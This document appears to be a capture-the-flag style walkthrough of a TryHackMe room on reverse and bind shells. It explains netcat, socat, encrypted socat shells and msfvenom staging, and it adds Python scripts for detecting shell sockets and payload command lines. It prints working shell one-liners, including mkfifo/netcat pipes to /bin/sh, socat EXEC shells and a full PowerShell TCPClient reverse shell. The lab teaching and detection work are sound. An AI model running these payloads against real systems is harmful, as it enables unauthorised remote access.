What the Shell?

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.


Last updated 4 years ago


This walkthrough of the tryHackMe room describes some techniques for getting a shell. Here I not only share the answers but also keep a 'digest'-style note of the room, so that those techniques can be reviewed quickly.

Task 2: Tools

Useful tools for shell:

  • Netcat

  • Socat

  • Metasploit multi/handler: the auxiliary/multi/handler module, used to receive reverse shells

  • msfvenom

Task 3: Types of shell

  1. Reverse shells are when the target is forced to execute code that connects back to your computer.

  2. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target.

Shells can be either interactive or non-interactive.
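To make the two directions concrete from the defender's side, here is an added example (not part of the room or of this writeup) that triages socket records: a shell-capable process holding an outbound connection points to a reverse shell, while one that is listening, or whose session was accepted on a local port, points to a bind shell. The ss -tnp style rows, the list of shell-capable process names and the ephemeral-port heuristic are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Processes that can hand a shell to a socket peer. Assumption: tune to your fleet.
SHELL_PROCESSES = {"sh", "bash", "dash", "zsh", "nc", "ncat", "socat", "powershell", "cmd"}

# Linux default ip_local_port_range (assumption; adjust for other platforms).
EPHEMERAL = range(32768, 61000)


@dataclass(frozen=True)
class Sock:
    state: str   # LISTEN or ESTAB
    local: str   # local ip:port
    peer: str    # peer ip:port (*:* for listeners)
    proc: str    # owning process name
    pid: int


# One `ss -tnp` style row: state, recv-q, send-q, local, peer, users:(("proc",pid=N,fd=M))
SS_ROW = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_ss(text: str) -> List[Sock]:
    """Parse ss-style rows; rows that do not match (header, blanks) are skipped."""
    socks = []
    for line in text.splitlines():
        m = SS_ROW.match(line.strip())
        if m:
            socks.append(Sock(m["state"], m["local"], m["peer"], m["proc"], int(m["pid"])))
    return socks


def port_of(addr: str) -> str:
    return addr.rsplit(":", 1)[-1]


def is_ephemeral(port: str) -> bool:
    return port.isdigit() and int(port) in EPHEMERAL


def classify(socks: List[Sock]) -> List[Tuple[Sock, str]]:
    """Label sockets owned by shell-capable processes as bind or reverse shell indicators.

    An ESTAB socket was accepted locally (bind shell) if the same process also holds a
    LISTEN socket on that local port, or, as a fallback when the listener has already
    closed, if the local port is a service-style port and the peer port is ephemeral.
    Any other ESTAB socket was dialled out by the shell process (reverse shell).
    """
    listening = {(s.proc, port_of(s.local)) for s in socks if s.state == "LISTEN"}
    findings = []
    for s in socks:
        if s.proc not in SHELL_PROCESSES:
            continue
        if s.state == "LISTEN":
            findings.append((s, "bind shell: shell-capable process listening"))
        elif s.state == "ESTAB":
            lp, pp = port_of(s.local), port_of(s.peer)
            if (s.proc, lp) in listening or (not is_ephemeral(lp) and is_ephemeral(pp)):
                findings.append((s, "bind shell: session accepted on local listener"))
            else:
                findings.append((s, "reverse shell: shell-capable process connected out"))
    return findings


def triage(text: str) -> List[str]:
    """Human-readable findings for a block of ss output."""
    return [f"{label} ({s.proc} pid {s.pid}, {s.local} <-> {s.peer})"
            for s, label in classify(parse_ss(text))]


# Constructed sample in ss -tnp layout: normal sshd traffic, one reverse shell,
# one bind shell whose listener is still open, and one whose listener has closed.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
ESTAB  0      0      192.168.1.20:22      192.168.1.50:50122 users:(("sshd",pid=2101,fd=4))
ESTAB  0      0      192.168.1.20:51234   10.10.14.5:4444    users:(("bash",pid=2211,fd=3))
LISTEN 0      1      0.0.0.0:4444         0.0.0.0:*          users:(("nc",pid=2300,fd=3))
ESTAB  0      0      192.168.1.20:4444    10.10.14.5:39870   users:(("nc",pid=2300,fd=4))
ESTAB  0      0      192.168.1.20:5555    10.10.14.5:41002   users:(("socat",pid=2400,fd=5))
"""

if __name__ == "__main__":
    for line in triage(SAMPLE_SS):
        print(line)
```

The port heuristic is only a fallback: a listener placed on an ephemeral-range port will be mislabelled as a reverse shell, so treat the label as a triage hint and confirm with the process tree and its parent.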

Task 4: Netcat

Netcat is the most basic tool in a pentester's toolkit when it comes to any kind of networking.

  1. Reverse shell (listener on our machine, the target connects back to it): nc -lvnp <port-number>

  2. Bind shell (we connect to the listener running on the target): nc <target-ip> <chosen-port>

-lvnp means

  • -l is used to tell netcat that this will be a listener

  • -v is used to request a verbose output

  • -n tells netcat not to resolve host names or use DNS. Explaining this is outside the scope of the room.

  • -p indicates that the port specification will follow.

Task 5: Netcat shell stabilization

There are many ways to stabilize netcat shells on Linux systems.

  • Technique 1: Python

    • To spawn a better featured bash shell: python -c 'import pty;pty.spawn("/bin/bash")'

    • Some targets may need the version of Python specified.

    • export TERM=xterm - this will give us access to term commands such as clear

    • Finally, in our own terminal we use stty raw -echo; fg

      • it turns off our own terminal echo

      • it foregrounds the shell

  • Technique 2: rlwrap

    • This technique is particularly useful when dealing with Windows shells

    • Listener command: rlwrap nc -lvnp <port>

  • Technique 3: socat

    • this technique is limited to Linux targets

Task 6: Socat

Reverse shell :

  • Basic syntax: socat TCP-L:<port> - this is similar to nc -lvnp <port>

  • Command to connect back

    • Windows: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Bind shell:

  • Command to connect

    • Windows: socat TCP-L:<PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP-L:<PORT> EXEC:"bash -li"

    • Command on our attacking machine to connect to the waiting listener: socat TCP:<TARGET-IP>:<TARGET-PORT> -

    • A more stable and Linux only command: socat TCP-L:<port> FILE:`tty`,raw,echo=0

Task 7: socat encrypted shell

Getting an encrypted reverse shell:

  • First, generate certificate: openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

  • The command above creates a 2048-bit RSA key with a matching cert file - valid for 1 year

  • Now, merge two created files into one: cat shell.key shell.crt > shell.pem

  • Reverse shell listener on attacker machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

  • Execute command on victim machine: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Getting an encrypted bind shell:

  • Run in Target machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

  • Attacker machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Note: even for a Windows target, use the certificate on the listener side.

Task 8: Common shell payloads

In recent netcat versions the -e option (e.g. -e /bin/sh) is not available, as it is considered insecure, so a different command is needed to attach a shell.

  • To create a bind shell:

    • In the Target machine: mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

    • Attacker machine: nc <TARGET-IP> <PORT>

  • For a reverse shell:

    • In the Target machine: mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

A standard one-liner PowerShell reverse shell is below; replace <ip> and <port> with the listener's address and port.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
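The one-liners in Tasks 5 to 8 share distinctive tokens: mkfifo with nc piped into /bin/sh, nc -e, socat with EXEC:, OPENSSL with verify=0, pty.spawn, and the PowerShell TCPClient, GetStream and iex chain. As an added example from the detection side (not code from the room or this writeup), the rules below match those tokens against constructed process-creation records; the rule names, record layout and sample command lines are assumptions, and the benign entries show what the patterns are meant to leave alone.

```python
import re
from typing import Dict, List

# Detection rules keyed on tokens the shell payloads in this room share.
# Rule names are assumptions; patterns are kept narrow to limit false positives.
RULES = [
    # mkfifo /tmp/f; nc ... < /tmp/f | /bin/sh >/tmp/f  (netcat without -e)
    ("netcat_fifo_shell",
     re.compile(r"mkfifo\s+\S+.*\b(nc|ncat|netcat)\b.*\|\s*(/bin/)?(ba)?sh\b")),
    # nc -e /bin/sh ... (older netcat builds that still allow -e)
    ("netcat_exec_shell",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*(sh|bash|cmd|powershell)\b", re.I)),
    # socat ... EXEC:<shell>, connecting out (TCP:) or listening (TCP-L:/TCP-LISTEN:)
    ("socat_exec_shell", re.compile(r"\bsocat\b.*\bEXEC:", re.I)),
    # socat OPENSSL[-LISTEN]:...,verify=0 : TLS-wrapped shell with certificate checks off
    ("socat_tls_no_verify", re.compile(r"\bsocat\b.*\bOPENSSL(-LISTEN)?:.*verify=0", re.I)),
    # python -c 'import pty;pty.spawn("/bin/bash")' used to upgrade a dumb shell
    ("python_pty_spawn", re.compile(r"\bpty\.spawn\(")),
    # PowerShell TCPClient -> GetStream -> iex read/execute loop
    ("powershell_tcpclient_shell", re.compile(r"TCPClient\(.*GetStream\(\).*\biex\b", re.I)),
]


def detect(cmdline: str) -> List[str]:
    """Return the names of every rule that matches one command line, in RULES order."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan(records: List[Dict]) -> List[Dict]:
    """Run detect() over process-creation records; keep only the ones with a hit."""
    hits = []
    for rec in records:
        rules = detect(rec["cmdline"])
        if rules:
            hits.append({"pid": rec["pid"], "user": rec["user"], "rules": rules})
    return hits


# Constructed process-creation records (pid, user, cmdline). IPs and ports are made up.
SAMPLE_RECORDS = [
    {"pid": 4101, "user": "www-data",
     "cmdline": "mkfifo /tmp/f; nc 10.10.14.5 4444 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f"},
    {"pid": 4102, "user": "www-data",
     "cmdline": 'socat TCP:10.10.14.5:4444 EXEC:"bash -li"'},
    {"pid": 4103, "user": "www-data",
     "cmdline": "socat OPENSSL:10.10.14.5:4443,verify=0 EXEC:/bin/bash"},
    {"pid": 4104, "user": "www-data",
     "cmdline": "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"},
    {"pid": 4105, "user": "svc_web",
     "cmdline": """powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$stream.Flush()};$client.Close()\""""},
    {"pid": 4106, "user": "www-data",
     "cmdline": "nc -e /bin/sh 10.10.14.5 4444"},
    # Benign: a port check and a plain socat port forward (no EXEC, no verify=0)
    {"pid": 4107, "user": "ops", "cmdline": "nc -zv db.internal 5432"},
    {"pid": 4108, "user": "ops", "cmdline": "socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit)
```

Feeding these rules real audit or EDR command-line telemetry is the point: the same payloads the room teaches are what an analyst expects to see in process-creation logs, and the account that spawned them (a web-server user here) is usually the strongest signal of all.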

Task 9: msfvenom

The standard syntax for msfvenom: msfvenom -p <PAYLOAD> <OPTIONS>

There are two types of reverse shell payload:

  1. Staged: the payload has two parts

    1. Stager: this goes to the target and only initiates the reverse connection. It carries no shell code itself.

    2. Reverse shell code: the bulk of the code, downloaded after the initial connection.

  2. Stageless: the whole reverse shell code is uploaded to the target and connects back. These are easier for antivirus and other detection software to spot.

Further reading:

  • A very good article on socat: Read here

  • A detailed explanation of the command can be found here: Link

  • Reverse shell cheat sheet list: Payloads All The Things

  • A very good cheat sheet about msfvenom: Link here